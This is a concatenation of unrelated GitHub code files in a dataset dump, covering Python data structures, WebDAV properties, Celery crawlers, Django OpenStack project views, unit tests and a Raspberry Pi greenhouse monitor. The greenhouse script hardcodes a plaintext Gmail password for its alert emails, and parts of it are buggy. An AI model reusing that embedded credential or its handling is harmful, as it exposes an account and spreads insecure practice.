np.mean(img[ind_11:ind_12, ind_21:ind_22, 1])\n result[ind_11:ind_12, ind_21:ind_22, 2] = np.mean(img[ind_11:ind_12, ind_21:ind_22, 2])\n\n return result\n\nimg = cv2.imread(\"imori.jpg\")\n\nresult = AveragePooling(img)\ncv2.imwrite(\"myans_07.jpg\", result)\n","repo_name":"OverHall27/Gasyori100knock","sub_path":"Question_01_10/myans/myans_07.py","file_name":"myans_07.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37299207823","text":"class LinkedList:\n '''Linked-List of nodes of primative data types'''\n def __init__(self, head=None):\n self.head = head\n \n def getHead(self):\n return self.head\n\n # Big O(1) - Inserts new Node at index(0) and shifts data down\n def insert(self, data):\n '''Inserts data node at the beginning of the linked-list'''\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n\n # Big O(n) - Must goes to nth elem to add to end\n def push(self, data):\n ''' 
\\'Pushes\\' data to the end of the linked list'''\n new_node = Node(data)\n if(self.head == None):\n self.head = new_node\n else:\n curr = self.head\n while(curr.next is not None):\n curr = curr.next\n curr.next = new_node\n \n # Big O(n) - Must go to (n-1)th elem\n def pop(self):\n '''Removes data node at the end of the linked-list'''\n if self.head == None:\n print(\"Linked-List is empty!!!\")\n elif self.head.next == None:\n self.head = None\n else:\n prev = self.head\n curr = self.head.next\n while(curr.next is not None):\n prev = curr\n curr = curr.next\n prev.next = None\n\n # Big O(n) - Worst case is last elem n\n def get(self, index):\n '''Gets data element at index'''\n curr = self.head\n for i in range(1, index):\n curr = curr.next\n return curr.data\n\n # Big (O)n\n def reverse(self):\n prev = None\n curr = self.head\n while(curr is not None):\n next_node = curr.next\n curr.next = prev\n prev = curr\n curr = next_node\n self.head = prev\n\n \n\n \n def __str__(self):\n string = \"LinkedList: [\"\n if self.head is not None:\n string+=f\"{self.head.data}\"\n curr = self.head.next\n while(curr is not None):\n string+=f\",{curr.data}\"\n curr = curr.next\n string+=\"]\"\n return string\n\nclass Node:\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n def getData(self):\n return self.data","repo_name":"jaredivory/COM250","sub_path":"python/data_structures_module/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14831682123","text":"from geotagx_validator.helper import check_arg_type\nimport geotagx_validator.project as validator\n\ndef format_project_configuration(configuration, validate_configuration=True):\n \"\"\"Formats the specified project configuration.\n\n Args:\n configuration (dict): A project configuration to format.\n validate_configuration (bool): If set to True, the specified configuration\n will be validated before it's processed.\n\n Returns:\n dict: The formatted project configuration.\n\n Raises:\n TypeError: If the configuration argument is not a dictionary, or\n validate_configuration is not a boolean.\n ValueError: If the specified configuration is not a valid project configuration.\n \"\"\"\n check_arg_type(format_project_configuration, \"configuration\", configuration, dict)\n check_arg_type(format_project_configuration, \"validate_configuration\", validate_configuration, bool)\n\n if validate_configuration:\n valid, message = validator.is_project_configuration(configuration)\n if not valid:\n raise ValueError(message)\n\n formatters = {\n \"name\": format_project_name,\n \"description\": format_project_description,\n \"repository\": format_project_repository,\n }\n for key in configuration:\n formatter = formatters.get(key)\n if formatter:\n configuration[key] = formatter(configuration[key], False)\n\n return configuration\n\n\ndef format_project_name(name, validate_name=True):\n \"\"\"Formats the specified project name.\n\n Formatting a project name will simply remove any leading and trailing whitespace.\n\n Args:\n name (str): A project name to format.\n validate_name (bool): If set to True, the specified project name will be\n validated before it's processed.\n\n Returns:\n basestring: The formatted project name.\n\n Raises:\n TypeError: If the name argument is not a basestring instance, or\n validate_name is not a boolean.\n ValueError: If the specified name is not valid.\n 
\"\"\"\n check_arg_type(format_project_name, \"name\", name, basestring)\n check_arg_type(format_project_name, \"validate_name\", validate_name, bool)\n\n if validate_name:\n valid, message = validator.is_project_name(name)\n if not valid:\n raise ValueError(message)\n\n return name.strip()\n\n\ndef format_project_description(description, validate_description=True):\n \"\"\"Formats the specified project description.\n\n Formatting a project description will simply remove any leading and trailing\n whitespace.\n\n Args:\n description (str): A project description to format.\n validate_description (bool): If set to True, the specified project\n description will be validated before it's processed.\n\n Returns:\n basestring: The formatted project description.\n\n Raises:\n TypeError: If the description argument is not a basestring instance, or\n validate_description is not a boolean.\n ValueError: If the specified description is not valid.\n \"\"\"\n check_arg_type(format_project_description, \"description\", description, basestring)\n check_arg_type(format_project_description, \"validate_description\", validate_description, bool)\n\n if validate_description:\n valid, message = validator.is_project_description(description)\n if not valid:\n raise ValueError(message)\n\n return description.strip()\n\n\ndef format_project_repository(repository, validate_repository=True):\n \"\"\"Formats the specified project repository.\n\n Formatting a project repository will simply remove any leading and trailing\n whitespace.\n\n Args:\n repository (str): A project repository to format.\n validate_repository (bool): If set to True, the specified project\n repository will be validated before it's processed.\n\n Returns:\n basestring: The formatted project repository.\n\n Raises:\n TypeError: If the repository argument is not a basestring instance, or\n validate_repository is not a boolean.\n ValueError: If the specified repository is not valid.\n \"\"\"\n check_arg_type(format_project_repository, \"repository\", repository, basestring)\n check_arg_type(format_project_repository, \"validate_repository\", validate_repository, bool)\n\n if validate_repository:\n valid, message = validator.is_project_repository(repository)\n if not valid:\n raise ValueError(message)\n\n return repository.strip()\n","repo_name":"othieno/geotagx-tool-formatter","sub_path":"src/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40252354320","text":"__docformat__ = 'restructuredtext'\n\nfrom xml.etree import ElementTree\n\nimport zope.component\nimport zope.interface\nfrom zope import schema\nfrom zope.schema.interfaces import IField\nfrom zope.schema.fieldproperty import FieldProperty\n\nfrom z3c.dav.interfaces import IDAVProperty, IDAVWidget, IDAVInputWidget\nfrom z3c.dav.interfaces import IOpaquePropertyStorage\nimport z3c.dav.widgets\nimport z3c.dav.utils\n\nclass DAVProperty(object):\n \"\"\"\n\n >>> from zope.interface.verify import verifyObject\n >>> from zope.schema import getFields\n >>> from zope.interface.interfaces import IInterface\n >>> from coreproperties import IDAVResourcetype\n >>> prop = DAVProperty('{DAV:}resourcetype', IDAVResourcetype)\n >>> verifyObject(IDAVProperty, prop)\n True\n >>> prop.namespace\n 'DAV:'\n >>> prop.__name__\n 'resourcetype'\n >>> verifyObject(IInterface, prop.iface)\n True\n >>> prop.field in getFields(prop.iface).values()\n True\n >>> verifyObject(IField, 
prop.field)\n True\n >>> prop.custom_widget is None\n True\n >>> prop.restricted\n False\n\n \"\"\"\n zope.interface.implements(IDAVProperty)\n\n namespace = FieldProperty(IDAVProperty['namespace'])\n __name__ = FieldProperty(IDAVProperty['__name__'])\n ## XXX - If a developer writes his own field and passes it into\n ## DAVProperty then it is next to impossible to get the to validate\n ## correctly.\n ## field = FieldProperty(IDAVProperty['field'])\n iface = FieldProperty(IDAVProperty['iface'])\n custom_widget = FieldProperty(IDAVProperty['custom_widget'])\n custom_input_widget = FieldProperty(IDAVProperty['custom_input_widget'])\n restricted = FieldProperty(IDAVProperty['restricted'])\n\n def __init__(self, tag, iface):\n namespace, name = z3c.dav.utils.parseEtreeTag(tag)\n self.namespace = namespace\n self.__name__ = name\n self.iface = iface\n self.field = iface[name]\n self.custom_widget = None\n self.custom_input_widget = None\n self.restricted = False\n\n\n_opaque_namespace_key = \"z3c.dav.properties.DAVOpaqueProperties\"\n\nclass DeadField(schema.Field):\n pass\n\n\nclass OpaqueWidget(z3c.dav.widgets.DAVWidget):\n\n def render(self):\n el = ElementTree.fromstring(self._value)\n return el\n\n\nclass OpaqueInputWidget(z3c.dav.widgets.DAVInputWidget):\n \"\"\"\n\n >>> class Storage(object):\n ... zope.interface.implements(IOpaquePropertyStorage)\n ... def __init__(self):\n ... self.data = {}\n ... def setProperty(self, tag, value):\n ... self.data[tag] = value\n ... def removeProperty(self, tag):\n ... del self.data[tag]\n ... def getProperty(self, tag):\n ... return self.data[tag]\n >>> storage = Storage()\n\n >>> from cStringIO import StringIO\n >>> from z3c.dav.publisher import WebDAVRequest\n >>> reqdata = '''\n ... \n ... \n ... 𐀀\n ... \n ... \n ... '''\n >>> request = WebDAVRequest(StringIO(reqdata),\n ... {'CONTENT_LENGTH': len(reqdata)})\n >>> request.processInputs()\n\n >>> prop = OpaqueProperty('{http://webdav.org/neon/litmus/}high-unicode')\n >>> widget = getWidget(prop, storage, request, type = IDAVInputWidget)\n\n >>> print widget.getInputValue() #doctest:+XMLDATA\n \\xf0\\x90\\x80\\x80\n\n \"\"\"\n\n def getInputValue(self):\n el = self.request.xmlDataSource.findall(\n \"{DAV:}set/{DAV:}prop/%s\" % self.context.tag)\n\n # XXX - ascii seems a bit wrong here\n return ElementTree.tostring(el[-1], encoding = \"utf-8\")\n\n\nclass IOpaqueField(IField):\n\n tag = schema.BytesLine(\n title = u\"ElementTree tag\",\n description = u\"This is the key used by the opaque properties storage\",\n required = True)\n\n\nclass OpaqueField(schema.Field):\n \"\"\"\n\n >>> from zope.interface.verify import verifyObject\n >>> field = OpaqueField(__name__ = 'test',\n ... title = u'Test opaque field',\n ... tag = '{testns:}test')\n\n >>> IOpaqueField.providedBy(field)\n True\n >>> field.tag\n '{testns:}test'\n\n >>> from zope.interface.verify import verifyObject\n >>> field = OpaqueField(__name__ = 'test',\n ... title = u'Test opaque field',\n ... 
tag = 'test')\n >>> IOpaqueField.providedBy(field)\n True\n >>> field.tag\n 'test'\n\n \"\"\"\n zope.interface.implements(IOpaqueField)\n\n tag = FieldProperty(IOpaqueField[\"tag\"])\n\n def __init__(self, tag, **kw):\n super(OpaqueField, self).__init__(**kw)\n self.tag = tag\n\n def get(self, obj):\n return obj.getProperty(self.tag)\n\n def set(self, obj, value):\n obj.setProperty(self.tag, value)\n\n\nclass OpaqueProperty(object):\n \"\"\"\n\n >>> from zope.interface.verify import verifyObject\n >>> prop = OpaqueProperty('{examplens:}testprop')\n >>> verifyObject(IDAVProperty, prop)\n True\n >>> IOpaqueField.providedBy(prop.field)\n True\n >>> prop.namespace\n 'examplens:'\n\n The namespace part of a opaque property can be None.\n\n >>> prop = OpaqueProperty('testprop')\n >>> verifyObject(IDAVProperty, prop)\n True\n >>> IOpaqueField.providedBy(prop.field)\n True\n >>> prop.namespace is None\n True\n\n \"\"\"\n zope.interface.implements(IDAVProperty)\n\n def __init__(self, tag):\n namespace, name = z3c.dav.utils.parseEtreeTag(tag)\n self.__name__ = name\n self.namespace = namespace\n self.iface = IOpaquePropertyStorage\n self.field = OpaqueField(\n __name__ = name,\n tag = tag,\n title = u\"\",\n description = u\"\")\n self.custom_widget = OpaqueWidget\n self.custom_input_widget = OpaqueInputWidget\n self.restricted = False\n\n\ndef getAllProperties(context, request):\n for name, prop in zope.component.getUtilitiesFor(IDAVProperty):\n adapter = zope.component.queryMultiAdapter((context, request),\n prop.iface,\n default = None)\n if adapter is None:\n continue\n\n yield prop, adapter\n\n adapter = IOpaquePropertyStorage(context, None)\n if adapter is None:\n raise StopIteration\n\n for tag in adapter.getAllProperties():\n yield OpaqueProperty(tag), adapter\n\n\ndef hasProperty(context, request, tag):\n prop = zope.component.queryUtility(IDAVProperty, name = tag, default = None)\n if prop is None:\n adapter = IOpaquePropertyStorage(context, None)\n if adapter is not None and adapter.hasProperty(tag):\n return True\n return False\n\n adapter = zope.component.queryMultiAdapter((context, request), prop.iface,\n default = None)\n if adapter is None:\n return False\n\n return True\n\n\ndef getProperty(context, request, tag, exists = False):\n prop = zope.component.queryUtility(IDAVProperty, name = tag, default = None)\n if prop is None:\n adapter = IOpaquePropertyStorage(context, None)\n if adapter is None:\n ## XXX - should we use the zope.publisher.interfaces.NotFound\n ## exceptin here.\n raise z3c.dav.interfaces.PropertyNotFound(context, tag, tag)\n\n if exists and not adapter.hasProperty(tag):\n ## XXX - should we use the zope.publisher.interfaces.NotFound\n ## exceptin here.\n raise z3c.dav.interfaces.PropertyNotFound(context, tag, tag)\n\n return OpaqueProperty(tag), adapter\n\n adapter = zope.component.queryMultiAdapter((context, request), prop.iface,\n default = None)\n if adapter is None:\n ## XXX - should we use the zope.publisher.interfaces.NotFound\n ## exceptin here.\n raise z3c.dav.interfaces.PropertyNotFound(context, tag, tag)\n\n return prop, adapter\n\n\ndef getWidget(prop, adapter, request, type = IDAVWidget):\n \"\"\"prop.field describes the data we want to render.\n \"\"\"\n if type is IDAVWidget and prop.custom_widget is not None:\n widget = prop.custom_widget(prop.field, request)\n elif type is IDAVInputWidget and prop.custom_input_widget is not None:\n widget = prop.custom_input_widget(prop.field, request)\n else:\n widget = zope.component.getMultiAdapter((prop.field, 
request), type)\n\n if IDAVWidget.providedBy(widget):\n field = prop.field.bind(adapter)\n widget.setRenderedValue(field.get(adapter))\n\n widget.namespace = prop.namespace\n\n return widget\n","repo_name":"mkerrin/z3c.dav","sub_path":"src/z3c/dav/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18243070176","text":"import subprocess\r\nimport sys\r\nimport os\r\nimport statistics as stat\r\nfrom random import randint\r\n\r\nif len(sys.argv[1:]) <= 0:\r\n print('test.py ')\r\n sys.exit(1)\r\n\r\ndef run(fp, type):\r\n return subprocess.run([sys.argv[1], fp, type], stdout=subprocess.PIPE)\r\n\r\n\r\ndef test():\r\n for fp in os.listdir('.'):\r\n if 'cmplx_numbers' in fp:\r\n cmul4 = []\r\n cmul3 = []\r\n for x in range(50):\r\n proc = run(fp, '4')\r\n cmul4.append(float(proc.stdout))\r\n proc = run(fp, '3')\r\n cmul3.append(float(proc.stdout))\r\n\r\n print(fp, 'cmul4', stat.mean(cmul4), stat.stdev(cmul4))\r\n print(fp, 'cmul3', stat.mean(cmul3), stat.stdev(cmul3))\r\n\r\n\r\ndef genNum(len):\r\n if len < 1:\r\n return ''\r\n elif len == 1:\r\n return str(randint(1, 9))\r\n\r\n return ''.join([str(randint(1, 9))] + [str(randint(0, 9)) for _ in range(len - 1)])\r\n\r\n\r\ndef genData(len, amt=50):\r\n fp = 'tmpfile.txt'\r\n with open(fp, 'w') as tmp:\r\n for amount in range(amt):\r\n num1 = genNum(len)\r\n num2 = genNum(len)\r\n txt = ''.join(['(', num1, ', ', num2, ')']) + \"\\n\"\r\n tmp.write(txt)\r\n return fp\r\n\r\n\r\nfor bitlen in [50]:#, 50, 60, 70, 80, 90, 100, 200]:\r\n cmul3 = []\r\n cmul4 = []\r\n\r\n print('Generating Data')\r\n for multiplies in range(1, 200):\r\n fp = genData(bitlen, multiplies)\r\n\r\n data = []\r\n for _ in range(3):\r\n data.append(float(run(fp, '3').stdout))\r\n\r\n cmul3.append((multiplies, sum(data)/len(data)))\r\n\r\n data = []\r\n for _ in range(3):\r\n data.append(float(run(fp, '4').stdout))\r\n\r\n cmul4.append((multiplies, sum(data)/len(data)))\r\n\r\n print('Graphing...')\r\n import matplotlib.pyplot as plt\r\n\r\n fig, ax = plt.subplots()\r\n\r\n x = [tup[0] for tup in cmul3]\r\n y = [tup[1] for tup in cmul3]\r\n plt.plot(x, y, label='cmul3')\r\n\r\n x = [tup[0] for tup in cmul4]\r\n y = [tup[1] for tup in cmul4]\r\n plt.plot(x, y, label='cmul4')\r\n\r\n ax.legend(loc='upper left')\r\n ax.set_title(\"3-Multiply vs. 4-Multiply (\"+str(bitlen)+\"bits)\")\r\n ax.set_xlabel(\"# of multiplies\")\r\n ax.set_ylabel(\"Time\")\r\n\r\n plt.show()","repo_name":"Sieabah/cmsc-441","sub_path":"proj1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18859448816","text":"'''\nCount sort. 
\nOutperforms the default sorting routine when the range of values is reasonably bounded.\n'''\n\ndef count_sort(a):\n mn, mx = float('inf'), -float('inf')\n for x in a:\n if x < mn: mn = x\n if x > mx: mx = x\n counter = [0 for _ in range(mx - mn + 1)]\n for x in a:\n counter[x - mn] += 1\n j = 0\n for i in range(mx - mn + 1):\n a[j:j+counter[i]] = [i + mn]*counter[i]\n j += counter[i]\n","repo_name":"DSC-ChitkaraUniv/HacktoberFest-2020","sub_path":"Coding/Python/Counting sort.py","file_name":"Counting sort.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"34656046103","text":"import os\nimport time\nimport Adafruit_DHT\nimport paho.mqtt.client as mqtt\nfrom datetime import datetime\nimport smtplib, ssl\n\nDHT_SENSOR = Adafruit_DHT.AM2302\nDHT_PIN = 4\ntemp_list = []\nhum_list = []\ntemp_average = 0\nhum_average = 0\nclient = mqtt.Client()\ncsv = None\nport = 587 # For SSL email server\nsmtp_server = \"smtp.gmail.com\"\nsender_email = \"gewaechshaustemperatur@gmail.com\" # Enter your address\nreceiver_email = \"gewaechshaustemperatur@gmail.com\" # Enter receiver address\npassword = \"raspberrypi\"\n\nmessage = \"\"\"\\\nSubject: Geweachshaustemperatur niedrig\n\nTemperatur zu niedrig, bitte ueberpruefen\"\"\"\n\n\n\ntry:\n csv = open('/home/pi/humidity.csv', 'a+')\n if os.stat('/home/pi/humdity.csv').st_size == 0:\n csv.write('Date,Time,Temperature,Humidity\\t\\n')\nexcept:\n pass\n\ndef main():\n# open_csv()\n# if open_csv() is not True:\n# print(\"-1\")\n# return -1\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(\"192.168.2.54\", 1883, 60)\n count = 0 # count to keep cooldown after sending warning email\n while True:\n temp, hum = get_temperature_humidity()\n if(valid_temperature(temp) and valid_humidity(hum)):\n temp_list.append(temp)\n temp_list.pop(0)\n hum_list.append(hum)\n hum_list.pop(0)\n cal_avg_hum()\n cal_avg_temp()\n save_values_in_csv(temp, hum)\n now = datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n data = \"temperature: {}, humidity: {}, date: {}\".format(temp, hum, dt_string)\n client.publish(\"data\", data, 1)\n\n if(len(temp_list) > 0 and sum(temp_list) / len(temp_list) <= 9.5 and count == 0):\n send_mail()\n count = 120\n\n if(count > 0):\n count = count - 1 \n\n\n time.sleep(10)\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"$SYS/#\")\n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n\ndef get_temperature_humidity():\n while True: \n humidity, temperature = Adafruit_DHT.read_retry(DHT_SENSOR, DHT_PIN)\n if humidity is not None and temperature is not None:\n return temperature, humidity\n\n# Berechnet Durchschnittstemperatur\ndef cal_avg_temp():\n if temp_list:\n help_average = 0\n for i in range(0, len(temp_list)):\n help_average = help_average + temp_list[i]\n temp_average = help_average / len(temp_list)\n\n# Berechnet Durchschnittsfeuchtigkeit\ndef cal_avg_hum():\n if hum_list:\n help_average = 0\n for i in range(0, (hum_list)):\n help_average = help_average + hum_list[i]\n hum_average = help_average / len(hum_list)\n\n# Checks if temperature is valid | abweichung von avg_temperature\ndef 
valid_temperature(temp):\n if len(temp_list) >= 15:\n if cal_avg_temp() >= (temp + 5) or cal_avg_temp <= (temp + 5):\n return True\n return False\n return True\n\n# Checks if humidity is valid | abweichung von avg_humidity\ndef valid_humidity(hum):\n if len(hum_list) >= 15:\n if cal_avg_hum() >= (hum + 5) or cal_avg_hum <= (hum + 5):\n return True\n return False\n return True\n\n# Speichert übergebene Werte in .csv Datei\ndef save_values_in_csv(temp, hum):\n csv.write('{0},{1},{2:0.1f}*C,{3:0.1f}%\\r\\n'.format(time.strftime('%m/%d/%y'), time.strftime('%H:%M'), temp, hum))\n\n# Öffnet .csv Datei -> True: Erfolg\ndef open_csv():\n try:\n csv = open('/home/pi/humidity.csv', 'a+')\n if os.stat('/home/pi/humidity.csv').st_size == 0:\n csv.write('Date,Time,Temperature,Humidity\\r\\n')\n return True\n except:\n return False\n\n\n# sends temperature warning email\ndef send_mail():\n context = ssl.create_default_context()\n with smtplib.SMTP(smtp_server, port) as server:\n server.ehlo() # Can be omitted\n server.starttls(context=context)\n server.ehlo() # Can be omitted\n server.login(sender_email, password)\n server.sendmail(sender_email, receiver_email, message)\n server.quit()\n\nmain()\n","repo_name":"peta999/Test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19520723447","text":"from datetime import timedelta\nfrom crawlers import *\nfrom celery import Celery\nfrom celery.task import periodic_task\n\nimport os\nos.environ.setdefault('FORKED_BY_MULTIPROCESSING', '1')\n\n\napp = Celery('tasks', backend='amqp',\n broker='amqp://guest@localhost//')\n\n\n@periodic_task(run_every=timedelta(seconds=15))\ndef a():\n\tprint(\"calling fuctions...\")\n\tprint(\"HDFILMSIZLE starting...\")\n\ttry:\n\t\th = HdFilmsIzle()\n\t\th.getNewFilms()\n\t\th.writeToTxt()\n\t\tprint(\"HDFILMSIZLE finished!\")\n\texcept Exception as e:\n\t\tprint(e)\n\tprint(\"EKRANLARDAN starting...\")\n\ttry:\n\t\te = Ekranlardan()\n\t\te.getNewFilms()\n\t\te.writeToTxt()\n\t\tprint(\"EKRANLARDAN finished...\")\n\texcept Exception as e:\n\t\tprint(e)\n\tprint(\"UltraHdFilm starting...\")\n\ttry:\n\t\th = UltraHdFilm()\n\t\th.getNewFilms()\n\t\th.writeToTxt()\n\t\tprint(\"UltraHdFilm finished!\")\n\texcept Exception as e:\n\t\tprint(e)\n\tprint(\"FullHdFilmSitesi starting...\")\n\ttry:\n\t\te = FullHdFilmSitesi()\n\t\te.getNewFilms()\n\t\te.writeToTxt()\n\t\tprint(\"FullHdFilmSitesi finished...\")\n\texcept Exception as e:\n\t\tprint(e)\n\tprint(\"FilmIzleFilmSitesi starting...\")\n\ttry:\n\t\th = FilmIzleFilmSitesi()\n\t\th.getNewFilms()\n\t\th.writeToTxt()\n\t\tprint(\"FilmIzleFilmSitesi finished...\")\n\texcept Exception as e:\n\t\tprint(e)\n\n","repo_name":"e1nurh/yenifilmler_in","sub_path":"crawlers/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71603180969","text":"n = int(input())\r\nlista = []\r\ntotal = 0\r\n\r\nfor i in range(n):\r\n lista.append(int(input()))\r\n\r\n# maisCaro maisBarato | sort(reverse=True)\r\nlista.sort()\r\nlista.reverse()\r\n\r\nfor i in range(len(lista)):\r\n if i % 3 == 2:\r\n continue # passa para o proximo elemento da lista\r\n total += 
lista[i]\r\n\r\nprint(total)","repo_name":"kaiquesouzasantos/estudos-python","sub_path":"NepsAcademy/tresPorDois.py","file_name":"tresPorDois.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31080879976","text":"import logging\n\nfrom django.db.models import Count, Q\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django_filters.rest_framework import FilterSet\nfrom django_filters.rest_framework import NumberFilter\nfrom django.utils.translation import ugettext_lazy as _\nfrom rest_framework import filters\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\n\nfrom fleio.activitylog.utils.decorators import log_staff_activity\nfrom fleio.core.permissions.permissions_cache import permissions_cache\nfrom fleio.core.drf import CustomPermissions, StaffOnly\nfrom fleio.core.exceptions import ForbiddenException, ObjectNotFound\nfrom fleio.core.features import staff_active_features\nfrom fleio.core.filters import CustomFilter\n\nfrom fleio.openstack.api.identity import IdentityAdminApi\nfrom fleio.openstack.models import Project\nfrom fleio.openstack.project import Project as OpenstackProject\nfrom fleio.openstack import tasks\nfrom fleio.openstack.settings import plugin_settings\nfrom fleio.openstack.settings import get_excluded_projects\n\nfrom keystoneauth1.exceptions.http import NotFound\n\nfrom fleiostaff.openstack.projects.serializers import StaffProjectSerializers\n\nLOG = logging.getLogger(__name__)\n\n\nclass ProjectFilters(FilterSet):\n services_count = NumberFilter(field_name='services_count')\n\n class Meta:\n model = Project\n fields = ['services_count']\n\n\n@log_staff_activity(\n category_name='openstack', object_name='project',\n additional_activities={\n 'delete_project': _('Staff user {username} ({user_id}) deleted project ({object_id}).'),\n }\n)\nclass StaffProjectViewSet(viewsets.ModelViewSet):\n serializer_class = StaffProjectSerializers\n serializer_map = {\n 'create': StaffProjectSerializers,\n 'update': StaffProjectSerializers\n }\n permission_classes = (CustomPermissions, StaffOnly,)\n filter_backends = (filters.OrderingFilter, DjangoFilterBackend, CustomFilter, filters.SearchFilter)\n filter_class = ProjectFilters\n ordering_fields = ('project_id', 'project_domain_id', 'disabled', 'is_domain', 'name', 'created_at', 'updated_at')\n search_fields = ('project_id', 'project_domain_id', 'fleio_disabled_reason', 'name', 'description')\n ordering = ['-created_at']\n\n @property\n def identity_admin_api(self):\n if hasattr(self, 'request'):\n return IdentityAdminApi(request_session=self.request.session)\n else:\n return IdentityAdminApi()\n\n def get_queryset(self):\n if self.action == 'list':\n services_count = Count('service')\n return Project.objects.exclude(\n Q(project_id__in=get_excluded_projects()) | Q(deleted=True)\n ).annotate(\n services_count=services_count\n ).all()\n else:\n return Project.objects.all()\n\n def list(self, request, *args, **kwargs):\n response = super().list(request=request, *args, **kwargs)\n response.data['permissions'] = permissions_cache.get_view_permissions(request.user, self.basename)\n return response\n\n def get_serializer_class(self):\n return self.serializer_map.get(self.action, self.serializer_class)\n\n def destroy(self, request, *args, **kwargs):\n return Response(status=501, data={'detail': _('Not implemented')})\n\n def 
perform_update(self, serializer):\n db_project = Project.objects.get(id=serializer.validated_data['id'])\n openstack_project = OpenstackProject.with_admin_session(db_project.project_id)\n try:\n openstack_project.update(\n name=serializer.validated_data['name'],\n description=serializer.validated_data['description'],\n enabled=not serializer.validated_data['disabled']\n )\n except NotFound as e:\n raise ObjectNotFound(detail=e)\n\n def perform_create(self, serializer):\n self.identity_admin_api.client.projects.create(\n name=serializer.validated_data['name'],\n description=serializer.validated_data['description'],\n domain=plugin_settings.PROJECT_DOMAIN_ID,\n enabled=not serializer.validated_data.get('disabled', False)\n )\n\n @action(detail=True, methods=['post'])\n def delete_project(self, request, pk):\n del pk # unused\n\n if staff_active_features.is_enabled('demo'):\n raise ForbiddenException(detail=_('Operation not allowed in demo mode'))\n\n delete_all_resources = request.data.get('delete_all_resources', False)\n instance = self.get_object()\n if delete_all_resources:\n tasks.delete_client_project_resources.delay(project_id=instance.project_id, mark_project_as_deleted=False)\n return Response(\n status=200,\n data={'details': _('Project delete scheduled')}\n )\n else:\n project = OpenstackProject.with_admin_session(instance.project_id)\n project.delete()\n return Response(\n status=200,\n data={'details': _('Project deleted')}\n )\n\n @action(detail=False, methods=['get'])\n def permissions(self, request):\n view_permissions = permissions_cache.get_view_permissions(request.user, self.basename)\n return Response(data=view_permissions)\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/fleiostaff/openstack/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2773337589","text":"import unittest\nfrom mdict import *\nfrom hypothesis import given\nimport hypothesis.strategies as st\n\n\nclass TestImmutableList(unittest.TestCase):\n\n def test_add(self):\n dict = mydict()\n dict.add(\"1\", 2)\n dict.add(\"hh\", 'cat')\n dict.add(\"0ii\", 'dog')\n self.assertEqual(dict.to_list(), [[\"0ii\", 'dog'], [\"1\", 2], [\"hh\", 'cat']])\n\n def test_remove(self):\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 'cat')\n dict.add(0, 'dog')\n\n dict.remove(1)\n self.assertEqual(dict.to_list(), [[0, 'dog'], [2, 'cat']])\n\n def test_size(self):\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 'cat')\n dict.add(0, 'dog')\n self.assertEqual(dict.size(), 3)\n\n def test_find(self):\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 'cat')\n dict.add(0, 'dog')\n self.assertEqual(dict.find(2), 'cat')\n\n def test_iterator(self):\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 'cat')\n dict.add(0, 'dog')\n dicList = []\n for dic in dict:\n dicList.append(dic)\n self.assertEqual(dicList, [[0, 'dog'], [1, 2], [2, 'cat']])\n itrate1 = iter(dict)\n itrate2 = iter(dict)\n leng = len(dicList)\n while(leng):\n self.assertEqual(next(itrate1),next(itrate2))\n leng-=1\n\n def test_filter(self):\n def func(k):\n if k % 2 == 0:\n return True\n return False\n\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 2)\n dict.add(0, 2)\n list = dict.to_list()\n list2 = []\n for i in range(len(list)):\n if func(list[i][0]):\n list2.append(list[i])\n\n itor = dict.filter(func)\n test = []\n while itor.has_next():\n test.append(itor.__next__())\n self.assertEqual(test, list2)\n\n 
